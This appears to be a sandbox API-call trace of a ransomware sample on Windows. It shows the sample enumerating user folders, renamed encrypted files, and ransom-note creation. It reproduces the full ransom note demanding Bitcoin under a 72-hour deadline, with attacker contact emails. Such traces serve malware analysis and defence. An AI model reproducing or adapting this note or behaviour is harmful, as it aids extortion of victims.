	[0198.268] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="packages") returned 0x0
	[0198.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.268] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="cookies") returned 0x0
	[0198.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.268] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\saved pictures\\*.*", lpSrch="programdata") returned 0x0
	[0198.268] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0198.268] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0198.269] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x8fb28467, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0198.269] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0198.269] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0198.269] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fb28467, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8fb28467, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8fb4e698, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0198.269] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fb02355, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8fb02355, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8fb28467, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0198.269] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fb02355, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8fb02355, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8fb28467, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0198.269] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0198.269] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0198.270] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e81571c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e81571c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e81571c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vy9x-mc7wsgckhxyx.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="VY9X-M~1.SCL")) returned 1
	[0198.270] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e861a54, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e861a54, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e888037, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x14b10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vyvcuxi7nluwawqyke.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="VYVCUX~1.SCL")) returned 1
	[0198.270] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e9b9053, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e9b9053, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e9df0e5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xae0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="we1ovw4nq.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="WE1OVW~1.SCL")) returned 1
	[0198.270] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea057af, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ea057af, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ea057af, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x10c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z2radgjxb42cwjf.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="Z2RADG~1.SCL")) returned 1
	[0198.270] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea9dc84, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ea9dc84, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ea9dc84, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_e-nmmcft1rdu.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="_E-NMM~1.SCL")) returned 1
	[0198.270] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea9dc84, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ea9dc84, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ea9dc84, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_e-nmmcft1rdu.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="_E-NMM~1.SCL")) returned 0
	[0198.270] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0198.271] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0198.271] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1
	[0198.271] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1
	[0198.271] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1
	[0198.271] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0198.272] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0198.272] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="PrintHood" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\PrintHood") returned="C:\\Users\\RDhJ0CNFevzX\\PrintHood"
	[0198.272] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\PrintHood" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\PrintHood") returned="C:\\Users\\RDhJ0CNFevzX\\PrintHood"
	[0198.272] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\PrintHood", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\") returned="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\"
	[0198.272] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\") returned="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\"
	[0198.272] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\*.*"
	[0198.272] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\printhood\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea9dc84, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ea9dc84, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ea9dc84, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_e-nmmcft1rdu.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="_E-NMM~1.SCL")) returned 0xffffffff
	[0198.272] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0198.273] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\PrintHood" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\PrintHood") returned="C:\\Users\\RDhJ0CNFevzX\\PrintHood"
	[0198.273] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\PrintHood", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\*.*"
	[0198.273] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.273] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.273] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\HELP_DECRYPT_YOUR_FILES.TXT") returned 59
	[0198.273] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\printhood\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.523] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0198.523] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0198.526] CloseHandle (hObject=0x380) returned 1
	[0198.526] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.527] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.527] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0198.528] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0198.529] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\printhood\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.535] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0198.535] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0198.535] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0198.535] CloseHandle (hObject=0x380) returned 1
	[0198.535] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.536] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.536] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0198.536] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\HELP_DECRYPT_YOUR_FILES.HTML") returned 60
	[0198.536] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\printhood\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.537] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0198.537] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0198.540] CloseHandle (hObject=0x380) returned 1
	[0198.540] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.541] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.541] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.541] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0198.548] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.548] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\printhood\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.549] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0198.549] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.549] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0198.549] CloseHandle (hObject=0x380) returned 1
	[0198.550] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\PrintHood\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\printhood\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea9dc84, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ea9dc84, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ea9dc84, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_e-nmmcft1rdu.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="_E-NMM~1.SCL")) returned 0xffffffff
	[0198.550] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0198.550] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1
	[0198.550] lstrcmpW (lpString1="Recent", lpString2="..") returned 1
	[0198.550] lstrcmpW (lpString1="Recent", lpString2=".") returned 1
	[0198.550] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0198.550] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0198.551] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Recent" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Recent") returned="C:\\Users\\RDhJ0CNFevzX\\Recent"
	[0198.551] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Recent" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Recent") returned="C:\\Users\\RDhJ0CNFevzX\\Recent"
	[0198.551] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Recent\\") returned="C:\\Users\\RDhJ0CNFevzX\\Recent\\"
	[0198.551] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Recent\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Recent\\") returned="C:\\Users\\RDhJ0CNFevzX\\Recent\\"
	[0198.551] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Recent\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Recent\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Recent\\*.*"
	[0198.551] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Recent\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\recent\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ea9dc84, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ea9dc84, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ea9dc84, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_e-nmmcft1rdu.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="_E-NMM~1.SCL")) returned 0xffffffff
	[0198.551] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0198.551] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Recent" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Recent") returned="C:\\Users\\RDhJ0CNFevzX\\Recent"
	[0198.551] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Recent", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Recent\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Recent\\*.*"
	[0198.551] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0198.552] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0198.552] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Recent\\HELP_DECRYPT_YOUR_FILES.TXT") returned 56
	[0198.552] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Recent\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\recent\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0198.553] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
